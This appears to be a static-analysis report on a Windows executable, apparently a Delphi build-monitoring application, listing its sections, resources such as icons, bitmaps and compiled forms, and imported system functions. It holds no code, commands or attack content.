                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x2f9bc80x9ac.idata
                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                          Sections

                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                          .text0x10000x2d92940x2d9400f170904968d3ed783b9857afe56d971dunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                          .itext0x2db0000x12500x14009be26a59bc8233b92ec9bd79fd07ff13False0.5412109375data6.099813281792287IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                          .data0x2dd0000x110780x11200256a4c2423eae8f79b8ed7215ca95be3False0.3919793567518248data4.519234114373622IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                          .bss0x2ef0000x92980x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                          .idata0x2f90000x3f960x400059ebf4c01c9630c427cf9d4c8d4e72deFalse0.312255859375data5.248510626082326IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                          .tls0x2fd0000xd80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                          .rdata0x2fe0000x180x200bf0ac182db40dc29be077f98bf131377False0.052734375data0.2108262677871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                          .reloc0x2ff0000x297180x29800977696233ec3926b686d0b5feb0a425fFalse0.5087125847138554data6.690448253628545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                          .rsrc0x3290000x1ef2600x1ef400b3c5a3459f4cfe7e4d03cb542f60f1beFalse0.8037331208985361data7.776375373000245IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                          Resources

                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                          RT_CURSOR0x32bf780x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                                                          RT_CURSOR0x32c0ac0x134dataEnglishUnited States0.4642857142857143
                                                                                                                          RT_CURSOR0x32c1e00x134dataEnglishUnited States0.4805194805194805
                                                                                                                          RT_CURSOR0x32c3140x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"HebrewIsrael0.4675324675324675
                                                                                                                          RT_CURSOR0x32c4480x134dataEnglishUnited States0.36038961038961037
                                                                                                                          RT_CURSOR0x32c57c0x134dataEnglishUnited States0.4090909090909091
                                                                                                                          RT_CURSOR0x32c6b00x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                                                                          RT_CURSOR0x32c7e40x134dataHebrewIsrael0.3961038961038961
                                                                                                                          RT_CURSOR0x32c9180x134dataHebrewIsrael0.30194805194805197
                                                                                                                          RT_CURSOR0x32ca4c0x134dataHebrewIsrael0.30194805194805197
                                                                                                                          RT_CURSOR0x32cb800x134dataEnglishUnited States0.38311688311688313
                                                                                                                          RT_BITMAP0x32ccb40x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                                                                          RT_BITMAP0x32ce840x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 380EnglishUnited States0.46487603305785125
                                                                                                                          RT_BITMAP0x32d0680x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                                                                          RT_BITMAP0x32d2380x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39870689655172414
                                                                                                                          RT_BITMAP0x32d4080x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.4245689655172414
                                                                                                                          RT_BITMAP0x32d5d80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5021551724137931
                                                                                                                          RT_BITMAP0x32d7a80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5064655172413793
                                                                                                                          RT_BITMAP0x32d9780x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                                                                          RT_BITMAP0x32db480x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5344827586206896
                                                                                                                          RT_BITMAP0x32dd180x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                                                                          RT_BITMAP0x32dee80xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.5208333333333334
                                                                                                                          RT_BITMAP0x32dfa80xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.42857142857142855
                                                                                                                          RT_BITMAP0x32e0880xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.4955357142857143
                                                                                                                          RT_BITMAP0x32e1680xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.38392857142857145
                                                                                                                          RT_BITMAP0x32e2480xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.4947916666666667
                                                                                                                          RT_BITMAP0x32e3080xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.484375
                                                                                                                          RT_BITMAP0x32e3c80xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.42410714285714285
                                                                                                                          RT_BITMAP0x32e4a80xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.5104166666666666
                                                                                                                          RT_BITMAP0x32e5680xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.5
                                                                                                                          RT_BITMAP0x32e6480xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.4870689655172414
                                                                                                                          RT_BITMAP0x32e7300xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.4895833333333333
                                                                                                                          RT_BITMAP0x32e7f00x528Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 2850 x 2850 px/m, 256 important colors0.35
                                                                                                                          RT_BITMAP0x32ed180xc0Device independent bitmap graphic, 11 x 11 x 4, image size 88RussianRussia0.4479166666666667
                                                                                                                          RT_BITMAP0x32edd80xc0Device independent bitmap graphic, 11 x 11 x 4, image size 88RussianRussia0.4479166666666667
                                                                                                                          RT_BITMAP0x32ee980xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128RussianRussia0.35344827586206895
                                                                                                                          RT_BITMAP0x32ef800x1e8Device independent bitmap graphic, 44 x 16 x 4, image size 3840.2192622950819672
                                                                                                                          RT_BITMAP0x32f1680x1e8Device independent bitmap graphic, 44 x 16 x 4, image size 3840.14959016393442623
                                                                                                                          RT_BITMAP0x32f3500x1e8Device independent bitmap graphic, 44 x 16 x 4, image size 3840.1762295081967213
                                                                                                                          RT_BITMAP0x32f5380x1e8Device independent bitmap graphic, 44 x 16 x 4, image size 3840.20901639344262296
                                                                                                                          RT_BITMAP0x32f7200x1e8Device independent bitmap graphic, 44 x 16 x 4, image size 3840.2151639344262295
                                                                                                                          RT_BITMAP0x32f9080x1e8Device independent bitmap graphic, 44 x 16 x 4, image size 3840.1680327868852459
                                                                                                                          RT_BITMAP0x32faf00x1e8Device independent bitmap graphic, 44 x 16 x 4, image size 3840.14549180327868852
                                                                                                                          RT_BITMAP0x32fcd80x1e8Device independent bitmap graphic, 44 x 16 x 4, image size 3840.1557377049180328
                                                                                                                          RT_BITMAP0x32fec00x528Device independent bitmap graphic, 16 x 16 x 8, image size 2560.36742424242424243
                                                                                                                          RT_BITMAP0x3303e80x518Device independent bitmap graphic, 16 x 15 x 8, image size 2400.33588957055214724
                                                                                                                          RT_BITMAP0x3309000x528Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 2850 x 2850 px/m, 256 important colorsRussianRussia0.18863636363636363
                                                                                                                          RT_BITMAP0x330e280x518Device independent bitmap graphic, 16 x 15 x 8, image size 2400.3581288343558282
                                                                                                                          RT_BITMAP0x3313400x528Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 3859 x 3859 px/m, 256 important colorsRussianRussia0.13636363636363635
                                                                                                                          RT_BITMAP0x3318680x528Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 2850 x 2850 px/m, 256 important colorsRussianRussia0.09090909090909091
                                                                                                                          RT_BITMAP0x331d900x528Device independent bitmap graphic, 16 x 16 x 8, image size 2560.36515151515151517
                                                                                                                          RT_BITMAP0x3322b80x6a8Device independent bitmap graphic, 40 x 16 x 8, image size 640, resolution 2834 x 2834 px/m0.10387323943661972
                                                                                                                          RT_BITMAP0x3329600x6a8Device independent bitmap graphic, 40 x 16 x 8, image size 640, resolution 2834 x 2834 px/m0.09213615023474178
                                                                                                                          RT_BITMAP0x3330080x6a8Device independent bitmap graphic, 40 x 16 x 8, image size 640, resolution 2834 x 2834 px/m0.10387323943661972
                                                                                                                          RT_BITMAP0x3336b00x6a8Device independent bitmap graphic, 40 x 16 x 8, image size 640, resolution 2834 x 2834 px/m0.0721830985915493
                                                                                                                          RT_BITMAP0x333d580x6a8Device independent bitmap graphic, 40 x 16 x 8, image size 640, resolution 2834 x 2834 px/m0.0698356807511737
                                                                                                                          RT_BITMAP0x3344000x6a8Device independent bitmap graphic, 40 x 16 x 8, image size 640, resolution 2834 x 2834 px/m0.06924882629107981
                                                                                                                          RT_BITMAP0x334aa80x528Device independent bitmap graphic, 16 x 16 x 8, image size 2560.33181818181818185
                                                                                                                          RT_BITMAP0x334fd00x108Device independent bitmap graphic, 10 x 7 x 24, image size 2240.14772727272727273
                                                                                                                          RT_BITMAP0x3350d80x208Device independent bitmap graphic, 10 x 15 x 24, image size 4800.13076923076923078
                                                                                                                          RT_BITMAP0x3352e00xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128RussianRussia0.3620689655172414
                                                                                                                          RT_BITMAP0x3353c80x668Device independent bitmap graphic, 24 x 24 x 8, image size 576, resolution 3779 x 3779 px/m, 256 important colorsRussianRussia0.4682926829268293
                                                                                                                          RT_BITMAP0x335a300x528Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 2850 x 2850 px/m, 256 important colors0.12954545454545455
                                                                                                                          RT_BITMAP0x335f580xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.4870689655172414
                                                                                                                          RT_BITMAP0x3360400x528Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 2850 x 2850 px/m, 256 important colorsRussianRussia0.24772727272727274
                                                                                                                          RT_BITMAP0x3365680x528Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 2898 x 2898 px/m, 256 important colors0.22575757575757577
                                                                                                                          RT_BITMAP0x336a900xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128, resolution 2834 x 2834 px/mRussianRussia0.38362068965517243
                                                                                                                          RT_BITMAP0x336b780xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128, resolution 3780 x 3780 px/mRussianRussia0.375
                                                                                                                          RT_BITMAP0x336c600x528Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 2882 x 2882 px/m, 256 important colorsRussianRussia0.21363636363636362
                                                                                                                          RT_BITMAP0x3371880x518Device independent bitmap graphic, 16 x 15 x 8, image size 2400.3581288343558282
                                                                                                                          RT_BITMAP0x3376a00x528Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 2850 x 2850 px/m, 256 important colorsRussianRussia0.2878787878787879
                                                                                                                          RT_BITMAP0x337bc80xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128, resolution 2835 x 2835 px/m0.3232758620689655
                                                                                                                          RT_BITMAP0x337cb00x1a8Device independent bitmap graphic, 40 x 16 x 4, image size 3200.17688679245283018
                                                                                                                          RT_BITMAP0x337e580x1a8Device independent bitmap graphic, 40 x 16 x 4, image size 3200.18160377358490565
                                                                                                                          RT_BITMAP0x3380000x1a8Device independent bitmap graphic, 40 x 16 x 4, image size 3200.18160377358490565
                                                                                                                          RT_BITMAP0x3381a80x1a8Device independent bitmap graphic, 40 x 16 x 4, image size 3200.18160377358490565
                                                                                                                          RT_BITMAP0x3383500x1a8Device independent bitmap graphic, 40 x 16 x 4, image size 3200.18160377358490565
                                                                                                                          RT_BITMAP0x3384f80x1d0Device independent bitmap graphic, 44 x 15 x 4, image size 3600.18318965517241378
                                                                                                                          RT_BITMAP0x3386c80x1d0Device independent bitmap graphic, 44 x 15 x 4, image size 3600.18318965517241378
                                                                                                                          RT_BITMAP0x3388980x1d0Device independent bitmap graphic, 44 x 15 x 4, image size 3600.18318965517241378
                                                                                                                          RT_BITMAP0x338a680x1d0Device independent bitmap graphic, 44 x 15 x 4, image size 3600.17456896551724138
                                                                                                                          RT_BITMAP0x338c380x1d0Device independent bitmap graphic, 44 x 15 x 4, image size 3600.17025862068965517
                                                                                                                          RT_BITMAP0x338e080xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128, resolution 2835 x 2835 px/m0.3793103448275862
                                                                                                                          RT_BITMAP0x338ef00xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128, resolution 2834 x 2834 px/mRussianRussia0.38362068965517243
                                                                                                                          RT_BITMAP0x338fd80xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128, resolution 3780 x 3780 px/mRussianRussia0.375
                                                                                                                          RT_BITMAP0x3390c00xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors0.4895833333333333
                                                                                                                          RT_BITMAP0x3391800x528Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 2850 x 2850 px/m, 256 important colorsRussianRussia0.2787878787878788
                                                                                                                          RT_BITMAP0x3396a80x158Device independent bitmap graphic, 20 x 20 x 4, image size 2400.2819767441860465
                                                                                                                          RT_BITMAP0x3398000x158Device independent bitmap graphic, 20 x 20 x 4, image size 2400.27906976744186046
                                                                                                                          RT_BITMAP0x3399580x158Device independent bitmap graphic, 20 x 20 x 4, image size 2400.2936046511627907
                                                                                                                          RT_BITMAP0x339ab00x158Device independent bitmap graphic, 20 x 20 x 4, image size 2400.2936046511627907
                                                                                                                          RT_BITMAP0x339c080x158Device independent bitmap graphic, 20 x 20 x 4, image size 2400.3226744186046512
                                                                                                                          RT_BITMAP0x339d600x158Device independent bitmap graphic, 20 x 20 x 4, image size 2400.2616279069767442
                                                                                                                          RT_BITMAP0x339eb80x158Device independent bitmap graphic, 20 x 20 x 4, image size 2400.2877906976744186
                                                                                                                          RT_BITMAP0x33a0100x158Device independent bitmap graphic, 20 x 20 x 4, image size 2400.2761627906976744
                                                                                                                          RT_BITMAP0x33a1680x158Device independent bitmap graphic, 20 x 20 x 4, image size 2400.3081395348837209
                                                                                                                          RT_BITMAP0x33a2c00x158Device independent bitmap graphic, 20 x 20 x 4, image size 2400.3023255813953488
                                                                                                                          RT_BITMAP0x33a4180x158Device independent bitmap graphic, 20 x 20 x 4, image size 2400.2761627906976744
                                                                                                                          RT_BITMAP0x33a5700x158Device independent bitmap graphic, 20 x 20 x 4, image size 2400.29069767441860467
                                                                                                                          RT_BITMAP0x33a6c80x158Device independent bitmap graphic, 20 x 20 x 4, image size 2400.24709302325581395
                                                                                                                          RT_BITMAP0x33a8200x158Device independent bitmap graphic, 20 x 20 x 4, image size 2400.3081395348837209
                                                                                                                          RT_BITMAP0x33a9780x158Device independent bitmap graphic, 20 x 20 x 4, image size 2400.27325581395348836
                                                                                                                          RT_BITMAP0x33aad00x158Device independent bitmap graphic, 20 x 20 x 4, image size 2400.26744186046511625
                                                                                                                          RT_BITMAP0x33ac280x158Device independent bitmap graphic, 20 x 20 x 4, image size 2400.2877906976744186
                                                                                                                          RT_BITMAP0x33ad800x158Device independent bitmap graphic, 20 x 20 x 4, image size 2400.2877906976744186
                                                                                                                          RT_BITMAP0x33aed80x158Device independent bitmap graphic, 20 x 20 x 4, image size 2400.2703488372093023
                                                                                                                          RT_BITMAP0x33b0300x158Device independent bitmap graphic, 20 x 20 x 4, image size 2400.26744186046511625
                                                                                                                          RT_BITMAP0x33b1880x158Device independent bitmap graphic, 20 x 20 x 4, image size 2400.26453488372093026
                                                                                                                          RT_BITMAP0x33b2e00xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128, resolution 2835 x 2835 px/m0.31896551724137934
                                                                                                                          RT_BITMAP0x33b3c80x528Device independent bitmap graphic, 16 x 16 x 8, image size 256RussianRussia0.31212121212121213
                                                                                                                          RT_BITMAP0x33b8f00xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128RussianRussia0.41810344827586204
                                                                                                                          RT_BITMAP0x33b9d80xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128RussianRussia0.3706896551724138
                                                                                                                          RT_BITMAP0x33bac00x528Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 2850 x 2850 px/m, 256 important colorsRussianRussia0.23863636363636365
                                                                                                                          RT_BITMAP0x33bfe80x118Device independent bitmap graphic, 7 x 10 x 24, image size 2400.1357142857142857
                                                                                                                          RT_BITMAP0x33c1000x2c8Device independent bitmap graphic, 31 x 7 x 24, image size 6720.09691011235955056
                                                                                                                          RT_BITMAP0x33c3c80xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.3794642857142857
                                                                                                                          RT_ICON0x33c4a80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.2402482269503546
                                                                                                                          RT_ICON0x33c9100x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.09943714821763602
                                                                                                                          RT_ICON0x33d9b80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.2402482269503546
                                                                                                                          RT_ICON0x33de200x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.09943714821763602
                                                                                                                          RT_DIALOG0x33eec80x52data0.7682926829268293
                                                                                                                          RT_DIALOG0x33ef1c0x52data0.7560975609756098
                                                                                                                          RT_STRING0x33ef700x2d4data0.3798342541436464
                                                                                                                          RT_STRING0x33f2440x238data0.522887323943662
                                                                                                                          RT_STRING0x33f47c0x188data0.5051020408163265
                                                                                                                          RT_STRING0x33f6040xd0StarOffice Gallery theme o, 1929405696 objects, 1st N0.6538461538461539
                                                                                                                          RT_STRING0x33f6d40x150data0.5
                                                                                                                          RT_STRING0x33f8240x4f4data0.3667192429022082
                                                                                                                          RT_STRING0x33fd180x2c4data0.461864406779661
                                                                                                                          RT_STRING0x33ffdc0x45cdata0.4211469534050179
                                                                                                                          RT_STRING0x3404380xd8data0.6666666666666666
                                                                                                                          RT_STRING0x3405100xd8data0.6574074074074074
                                                                                                                          RT_STRING0x3405e80x188data0.5408163265306123
                                                                                                                          RT_STRING0x3407700x3d8data0.41565040650406504
                                                                                                                          RT_STRING0x340b480x3b8data0.39285714285714285
                                                                                                                          RT_STRING0x340f000x3e0data0.37701612903225806
                                                                                                                          RT_STRING0x3412e00x36cdata0.3538812785388128
                                                                                                                          RT_STRING0x34164c0x378data0.40540540540540543
                                                                                                                          RT_STRING0x3419c40xc4data0.6173469387755102
                                                                                                                          RT_STRING0x341a880x9cdata0.6346153846153846
                                                                                                                          RT_STRING0x341b240x2d4data0.44751381215469616
                                                                                                                          RT_STRING0x341df80x434data0.34107806691449816
                                                                                                                          RT_STRING0x34222c0x2ecdata0.37566844919786097
                                                                                                                          RT_STRING0x3425180x304data0.3432642487046632
                                                                                                                          RT_RCDATA0x34281c0x10data1.5
                                                                                                                          RT_RCDATA0x34282c0xe04data0.5638238573021181
                                                                                                                          RT_RCDATA0x3436300xe5cPNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0029923830250271
                                                                                                                          RT_RCDATA0x34448c0x1f8PNG image data, 16 x 16, 8-bit gray+alpha, non-interlaced1.0158730158730158
                                                                                                                          RT_RCDATA0x3446840x19aPNG image data, 16 x 16, 8-bit gray+alpha, non-interlaced1.002439024390244
                                                                                                                          RT_RCDATA0x3448200xcbdPNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.003373198405397
                                                                                                                          RT_RCDATA0x3454e00xd21PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0032728354656353
                                                                                                                          RT_RCDATA0x3462040xccbPNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0033587786259541
                                                                                                                          RT_RCDATA0x346ed00x1e5PNG image data, 16 x 16, 8-bit gray+alpha, non-interlaced1.0185567010309278
                                                                                                                          RT_RCDATA0x3470b80x1f6PNG image data, 16 x 16, 8-bit gray+alpha, non-interlaced1.0179282868525896
                                                                                                                          RT_RCDATA0x3472b00xe5dPNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0029915692140332
                                                                                                                          RT_RCDATA0x3481100x43cf6Delphi compiled form 'TAgentFindForm'0.9157911791179117
                                                                                                                          RT_RCDATA0x38be080x617Delphi compiled form 'TBevelTitle'0.43617703656189866
                                                                                                                          RT_RCDATA0x38c4200x3d6Delphi compiled form 'TBuildMonitorDialogWithLinkForm'0.47963340122199594
                                                                                                                          RT_RCDATA0x38c7f80x4481aDelphi compiled form 'TBuildMonitorForm_'0.9107490324374025
                                                                                                                          RT_RCDATA0x3d10140x43c17Delphi compiled form 'TFindBarForm'0.9161991445877338
                                                                                                                          RT_RCDATA0x414c2c0x4b2Delphi compiled form 'TfrmBuildReport'0.5099833610648918
                                                                                                                          RT_RCDATA0x4150e00x3a3Delphi compiled form 'TInputDialog'0.5445757250268528
                                                                                                                          RT_RCDATA0x4154840x43687Delphi compiled form 'TMonitorGraphListForm'0.9217067543634079
                                                                                                                          RT_RCDATA0x458b0c0x7a34aDelphi compiled form 'TMonitorViewForm'0.6451651570060373
                                                                                                                          RT_RCDATA0x4d2e580x441a0Delphi compiled form 'TOpenBuildMonFileDialog'0.9121830905127911
                                                                                                                          RT_RCDATA0x516ff80x573Delphi compiled form 'TSaveAttachmentsForm'0.45878136200716846
                                                                                                                          RT_GROUP_CURSOR0x51756c0x14Lotus unknown worksheet or configuration, revision 0x1HebrewIsrael1.3
                                                                                                                          RT_GROUP_CURSOR0x5175800x14Lotus unknown worksheet or configuration, revision 0x1HebrewIsrael1.3
                                                                                                                          RT_GROUP_CURSOR0x5175940x14Lotus unknown worksheet or configuration, revision 0x1HebrewIsrael1.3
                                                                                                                          RT_GROUP_CURSOR0x5175a80x14Lotus unknown worksheet or configuration, revision 0x1HebrewIsrael1.3
                                                                                                                          RT_GROUP_CURSOR0x5175bc0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                          RT_GROUP_CURSOR0x5175d00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                          RT_GROUP_CURSOR0x5175e40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                          RT_GROUP_CURSOR0x5175f80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                          RT_GROUP_CURSOR0x51760c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                          RT_GROUP_CURSOR0x5176200x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                          RT_GROUP_CURSOR0x5176340x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                          RT_GROUP_ICON0x5176480x22dataEnglishUnited States0.9411764705882353
                                                                                                                          RT_GROUP_ICON0x51766c0x22dataEnglishUnited States1.0294117647058822
                                                                                                                          RT_VERSION0x5176900x328dataEnglishUnited States0.44554455445544555
                                                                                                                          RT_MANIFEST0x5179b80x60fXML 1.0 document, ASCII text, with CRLF line terminators0.4229529335912315
                                                                                                                          RT_MANIFEST0x517fc80x298XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4894578313253012

                                                                                                                          Imports

                                                                                                                          DLLImport
                                                                                                                          oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                                          advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                                          user32.dllGetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                                                                                                                          kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetTickCount, QueryPerformanceCounter, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, CreateDirectoryA, ExitProcess, ExitThread, CreateThread, CompareStringA, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
                                                                                                                          kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                                                          user32.dllCreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, TabbedTextOutA, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCaret, SetWindowRgn, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetKeyboardState, SetForegroundWindow, SetFocus, SetCursor, SetClipboardData, SetClassLongA, SetCaretPos, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindowEx, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OpenClipboard, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MessageBeep, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, IsCharAlphaNumericA, IsCharAlphaA, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, HideCaret, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetUserObjectInformationA, GetUpdateRect, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetProcessWindowStation, GetParent, GetWindow, GetMessagePos, GetMessageA, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDoubleClickTime, GetDlgItem, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassLongA, GetClassInfoA, GetCapture, GetAsyncKeyState, GetActiveWindow, FrameRect, FindWindowExA, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumClipboardFormats, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextExA, DrawTextW, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DestroyCaret, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, CreateCaret, CopyImage, CloseClipboard, ClientToScreen, ChildWindowFromPoint, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
